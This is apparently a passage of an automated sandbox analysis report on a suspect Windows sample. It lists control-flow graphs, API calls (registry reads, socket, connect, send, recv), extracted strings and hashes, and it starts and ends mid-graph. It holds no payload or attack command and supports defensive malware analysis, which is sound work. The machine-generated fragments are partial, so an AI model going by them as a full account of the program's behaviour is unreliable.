4ce3c0 1147->1173 1174 4d9e90-4d9e92 1147->1174 1163 4d9b75-4d9b86 call 4cea00 1149->1163 1164 4d9c11-4d9c1c call 4d7b70 1149->1164 1154->1129 1154->1133 1160 4d9dca-4d9ddb call 4ce960 1155->1160 1177 4d9ddd-4d9ddf 1160->1177 1178 4d9e2e-4d9e36 1160->1178 1163->1093 1185 4d9f2d 1163->1185 1164->1093 1190 4d9c22-4d9c33 call 4ce960 1164->1190 1170->1144 1197 4d9d3e-4d9d42 1170->1197 1200 4d9d71-4d9d73 1171->1200 1201 4d9dc2 1171->1201 1194 4da04a-4da04c 1173->1194 1195 4d9eb0-4d9eb1 1173->1195 1175 4d9eb3-4d9ec4 call 4ce9c0 1174->1175 1175->1035 1203 4d9eca-4d9ed0 1175->1203 1186 4d9e06-4d9e21 call 4ce9f0 call 4ce4a0 1177->1186 1183 4d9e3d-4d9e5b call 4cebf0 * 2 1178->1183 1184 4d9e38-4d9e3b 1178->1184 1192 4d9e5e-4d9e67 1183->1192 1184->1183 1184->1192 1185->1112 1226 4d9de1-4d9dee call 4cec80 1186->1226 1227 4d9e23-4d9e2c call 4ceac0 1186->1227 1213 4d9c35 1190->1213 1214 4d9c66-4d9c75 call 4d78a0 1190->1214 1192->1147 1192->1175 1206 4da04e-4da051 1194->1206 1207 4da057-4da070 call 4cebf0 * 2 1194->1207 1195->1175 1197->1147 1208 4d9d9a-4d9db5 call 4ce9f0 call 4ce4a0 1200->1208 1201->1160 1211 4d9ee5-4d9ef2 call 4ce9f0 1203->1211 1206->1049 1206->1207 1207->1090 1241 4d9d75-4d9d82 call 4cec80 1208->1241 1242 4d9db7-4d9dc0 call 4ceac0 1208->1242 1211->1035 1236 4d9ef8-4d9f0e call 4ce440 1211->1236 1221 4d9c37-4d9c51 call 4ce9f0 1213->1221 1232 4d9c7b-4d9c8f call 4ce7c0 1214->1232 1233 4da011 1214->1233 1221->1093 1254 4d9c57-4d9c64 call 4ce9d0 1221->1254 1247 4d9df1-4d9e04 call 4ce960 1226->1247 1227->1247 1232->1093 1256 4d9c95-4da00e 1232->1256 1233->1099 1252 4d9f10-4d9f26 call 4ce3c0 1236->1252 1253 4d9ed2-4d9edf call 4ce9e0 1236->1253 1258 4d9d85-4d9d98 call 4ce960 1241->1258 1242->1258 1247->1178 1247->1186 1252->1253 1269 4d9f28 1252->1269 1253->1035 1253->1211 1254->1214 1254->1221 1256->1233 1258->1201 1258->1208 1269->1049
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004D9946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004D9974
                                  • RegCloseKey.KERNELBASE(?), ref: 004D998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                  • API String ID: 3677997916-615551945
                                  • Opcode ID: e3e35325ed4ddcce8a69fed66d578d3e72f2bd73031c46f08ce504ba60976454
                                  • Instruction ID: 7e03ef838e170b736cf7c42a57bdf2138b623a0666c2359e46a9965d99b059f9
                                  • Opcode Fuzzy Hash: e3e35325ed4ddcce8a69fed66d578d3e72f2bd73031c46f08ce504ba60976454
                                  • Instruction Fuzzy Hash: C732B4F5904201ABEB51AB22AC52B1B76D4AF45308F08443FF809D6362FB39EE15D75B
                                  Function 00448B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1364 448b50-448b69 1365 448be6 1364->1365 1366 448b6b-448b74 1364->1366 1369 448be9 1365->1369 1367 448b76-448b8d 1366->1367 1368 448beb-448bf2 1366->1368 1370 448bf3-448bfe call 44a550 1367->1370 1371 448b8f-448ba7 call 426e40 1367->1371 1369->1368 1376 448de4-448def 1370->1376 1377 448c04-448c08 1370->1377 1378 448bad-448baf 1371->1378 1379 448cd9-448d16 SleepEx 1371->1379 1382 448df5-448e19 call 44a150 1376->1382 1383 448e8c-448e95 1376->1383 1380 448dbd-448dc3 1377->1380 1381 448c0e-448c1d 1377->1381 1384 448bb5-448bb9 1378->1384 1385 448ca6-448cb0 1378->1385 1400 448d22 1379->1400 1401 448d18-448d20 1379->1401 1380->1369 1388 448c35-448c48 call 44a150 1381->1388 1389 448c1f-448c30 connect 1381->1389 1422 448e88 1382->1422 1423 448e1b-448e26 1382->1423 1386 448e97-448e9c 1383->1386 1387 448f00-448f06 1383->1387 1384->1368 1392 448bbb-448bc2 1384->1392 1385->1379 1390 448cb2-448cb8 1385->1390 1394 448e9e-448eb6 call 422a00 1386->1394 1395 448edf-448eef call 4178b0 1386->1395 1387->1368 1421 448c4d-448c4f 1388->1421 1389->1388 1396 448ddc-448dde 1390->1396 1397 448cbe-448cd4 call 44b180 1390->1397 1392->1368 1399 448bc4-448bcc 1392->1399 1394->1395 1420 448eb8-448edd call 423410 * 2 1394->1420 1418 448ef2-448efc 1395->1418 1396->1369 1396->1376 1397->1376 1407 448bd4-448bda 1399->1407 1408 448bce-448bd2 1399->1408 1403 448d26-448d39 1400->1403 1401->1403 1410 448d43-448d61 call 42d8c0 call 44a150 1403->1410 1411 448d3b-448d3d 1403->1411 1407->1368 1416 448bdc-448be1 1407->1416 1408->1368 1408->1407 1440 448d66-448d74 1410->1440 1411->1396 1411->1410 1424 448dac-448db8 call 4550a0 1416->1424 1418->1387 1420->1418 1427 448c51-448c58 1421->1427 1428 448c8e-448c93 1421->1428 1422->1383 1429 448e2e-448e85 call 42d090 call 454fd0 1423->1429 1430 448e28-448e2c 1423->1430 1424->1368 1427->1428 1436 448c5a-448c62 1427->1436 1432 448dc8-448dd9 call 44b100 1428->1432 1433 448c99-448c9f 1428->1433 1429->1422 1430->1422 1430->1429 1432->1396 1433->1385 1441 448c64-448c68 1436->1441 1442 448c6a-448c70 1436->1442 1440->1368 1446 448d7a-448d81 1440->1446 1441->1428 1441->1442 1442->1428 1448 448c72-448c8b call 4550a0 1442->1448 1446->1368 1451 448d87-448d8f 1446->1451 1448->1428 1454 448d91-448d95 1451->1454 1455 448d9b-448da1 1451->1455 1454->1368 1454->1455 1455->1368 1457 448da7 1455->1457 1457->1424
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00448C30
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00448CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: d36ce63ca1521512f969632d5e807aacc249884770345d372758310bf9f53e9d
                                  • Instruction ID: e873f19083064af940b15e11080c1195d58fa31cea120f5f0436fabcdc1d158a
                                  • Opcode Fuzzy Hash: d36ce63ca1521512f969632d5e807aacc249884770345d372758310bf9f53e9d
                                  • Instruction Fuzzy Hash: 2DB1BF70604746AFF710CF24C985BABB7E0AF41318F14892EE8598B3D2DB78E859C765
                                  Function 00412F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1458 412f17-412f8c call 8e1af0 call 8e1ee0 1463 4131c9-4131cd 1458->1463 1464 412f91-412ff4 call 411619 RegOpenKeyExA 1463->1464 1465 4131d3-4131d6 1463->1465 1468 4131c5 1464->1468 1469 412ffa-41300b 1464->1469 1468->1463 1470 41315c-4131ac RegEnumKeyExA 1469->1470 1471 413010-413083 call 411619 RegOpenKeyExA 1470->1471 1472 4131b2-4131c2 1470->1472 1476 413089-4130d4 RegQueryValueExA 1471->1476 1477 41314e-413152 1471->1477 1472->1468 1478 4130d6-413137 call 8e1dc0 call 8e1e50 call 8e1ee0 call 8e1cf0 call 8e1ee0 call 8e0250 1476->1478 1479 41313b-41314b RegCloseKey 1476->1479 1477->1470 1478->1479 1479->1477
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: EnumOpen
                                  • String ID: d
                                  • API String ID: 3231578192-2564639436
                                  • Opcode ID: c6f3c7d7ea0167951e710417f2e437d2cfce836915a936b37e57aa28f9842611
                                  • Instruction ID: bf0bf0cadb37a7a3667a311f9187fc9d3f4e7699200ab9618772027e47d37a8c
                                  • Opcode Fuzzy Hash: c6f3c7d7ea0167951e710417f2e437d2cfce836915a936b37e57aa28f9842611
                                  • Instruction Fuzzy Hash: 4771B4B49043199FDB10EF69C58479EBBF0FF84308F10899DE99897311E7749A888F92
                                  Function 004176A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1492 4176a0-4176be 1493 4176c0-4176c7 1492->1493 1494 4176e6-4176f2 send 1492->1494 1493->1494 1495 4176c9-4176d1 1493->1495 1496 4176f4-417709 call 4172a0 1494->1496 1497 41775e-417762 1494->1497 1498 4176d3-4176e4 1495->1498 1499 41770b-417759 call 4172a0 call 41cb20 call 798c50 1495->1499 1496->1497 1498->1496 1499->1497
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,N=A,00000000,?,?,004207BF), ref: 004176EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$N=A$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-1082366280
                                  • Opcode ID: 71891ebab00c7d27c5863d1408e4b4af92dd444a8825f124cc6a6f27c372f4bd
                                  • Instruction ID: 2859b5521f88f631887c789da6c88d03383ca0d97583ed5088eed1826f57b354
                                  • Opcode Fuzzy Hash: 71891ebab00c7d27c5863d1408e4b4af92dd444a8825f124cc6a6f27c372f4bd
                                  • Instruction Fuzzy Hash: 1A113AB570E3087BD1209B15AC95E773B6CDFC3B2CF08095AF90853382E969AC41C6B2
                                  Function 00449290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1611 449290-4492ed call 4176a0 1614 4493c3-4493ce 1611->1614 1615 4492f3-4492fb 1611->1615 1624 4493e5-449427 call 42d090 call 454f40 1614->1624 1625 4493d0-4493e1 1614->1625 1616 449301-449333 call 42d8c0 call 42d9a0 1615->1616 1617 4493aa-4493af 1615->1617 1636 449335-449364 WSAIoctl 1616->1636 1637 4493a7 1616->1637 1618 4493b5-4493bc 1617->1618 1619 449456-449470 1617->1619 1622 4493be 1618->1622 1623 449429-449431 1618->1623 1622->1619 1627 449433-449437 1623->1627 1628 449439-44943f 1623->1628 1624->1619 1624->1623 1625->1618 1629 4493e3 1625->1629 1627->1619 1627->1628 1628->1619 1632 449441-449453 call 4550a0 1628->1632 1629->1619 1632->1619 1640 449366-44936f 1636->1640 1641 44939b-4493a4 1636->1641 1637->1617 1640->1641 1643 449371-449390 setsockopt 1640->1643 1641->1637 1643->1641 1644 449392-449395 1643->1644 1644->1641
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0044935D
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00449388
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: 67ac4a5690ea321fce241bf44a84cfe87ccc61283c2bbf71f4db90dfc325b211
                                  • Instruction ID: f7bc93eda2727c5b893867165aebd39bd0679658d745d0591ac0183912b94510
                                  • Opcode Fuzzy Hash: 67ac4a5690ea321fce241bf44a84cfe87ccc61283c2bbf71f4db90dfc325b211
                                  • Instruction Fuzzy Hash: 8A51CE70A04305ABE714DF24C881BABB7A5FF89318F14852AFD488B382E734ED91C795
                                  Function 00417770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1645 417770-41778e 1646 417790-417797 1645->1646 1647 4177b6-4177c2 recv 1645->1647 1646->1647 1648 417799-4177a1 1646->1648 1649 4177c4-4177d9 call 4172a0 1647->1649 1650 41782e-417832 1647->1650 1651 4177a3-4177b4 1648->1651 1652 4177db-417829 call 4172a0 call 41cb20 call 798c50 1648->1652 1649->1650 1651->1649 1652->1650
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                  • API String ID: 1507349165-640788491
                                  • Opcode ID: 489d97ba2fe1425c5452e5a5e22dc51008cf321a9d3c5c26e0f29c33b6cfde3b
                                  • Instruction ID: 8e048736b42c23a4e98b1a5a9c7807553e5bf362fb846c105db06686e63f5b25
                                  • Opcode Fuzzy Hash: 489d97ba2fe1425c5452e5a5e22dc51008cf321a9d3c5c26e0f29c33b6cfde3b
                                  • Instruction Fuzzy Hash: E7113DB570A3087BD1209B11AC59E773B6CDFC7B6CF080959B904633C2D965AC41C6F6
                                  Function 004175E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1664 4175e0-4175ed 1665 417607-417629 socket 1664->1665 1666 4175ef-4175f6 1664->1666 1668 41762b-41763c call 4172a0 1665->1668 1669 41763f-417642 1665->1669 1666->1665 1667 4175f8-4175ff 1666->1667 1670 417601-417602 1667->1670 1671 417643-417699 call 4172a0 call 41cb20 call 798c50 1667->1671 1668->1669 1670->1665
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                  • API String ID: 98920635-842387772
                                  • Opcode ID: ecd4cb7966bf6f9eb62b0cb7577edd2398122df92001c3d1bd32af880c658b2e
                                  • Instruction ID: aef0ef62b70de71892fbd4ca49846b32a5041aa7438d615b44f16e3d85addb01
                                  • Opcode Fuzzy Hash: ecd4cb7966bf6f9eb62b0cb7577edd2398122df92001c3d1bd32af880c658b2e
                                  • Instruction Fuzzy Hash: C8116F7274A31167DA105B69AC16FEB3B98DFC3738F480565F504932E2D6258C91C3F1
                                  Function 004DAA30 Relevance: 6.4, APIs: 4, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1682 4daa30-4daa64 1684 4daa6a-4daaa7 call 4ce730 1682->1684 1685 4dab04-4dab09 1682->1685 1689 4dab0e-4dab13 1684->1689 1690 4daaa9-4daabd 1684->1690 1687 4dae80-4dae89 1685->1687 1693 4dae2e 1689->1693 1691 4daabf-4daac7 1690->1691 1692 4dab18-4dab50 1690->1692 1691->1693 1694 4daacd-4dab02 1691->1694 1698 4dab58-4dab6d 1692->1698 1695 4dae30-4dae4a call 4cea60 call 4cebf0 1693->1695 1694->1698 1707 4dae4c-4dae57 1695->1707 1708 4dae75-4dae7d 1695->1708 1701 4dab6f-4dab73 1698->1701 1702 4dab96-4dabab socket 1698->1702 1701->1702 1704 4dab75-4dab8f 1701->1704 1702->1693 1706 4dabb1-4dabc5 1702->1706 1704->1706 1719 4dab91 1704->1719 1709 4dabc7-4dabca 1706->1709 1710 4dabd0-4dabed ioctlsocket 1706->1710 1712 4dae6e-4dae6f 1707->1712 1713 4dae59-4dae5e 1707->1713 1708->1687 1709->1710 1714 4dad2e-4dad39 1709->1714 1715 4dabef-4dac0a 1710->1715 1716 4dac10-4dac14 1710->1716 1712->1708 1713->1712 1720 4dae60-4dae6c 1713->1720 1717 4dad3b-4dad4c 1714->1717 1718 4dad52-4dad56 1714->1718 1715->1716 1727 4dae29 1715->1727 1722 4dac37-4dac41 1716->1722 1723 4dac16-4dac31 1716->1723 1717->1718 1717->1727 1726 4dad5c-4dad6b 1718->1726 1718->1727 1719->1693 1720->1708 1724 4dac7a-4dac7e 1722->1724 1725 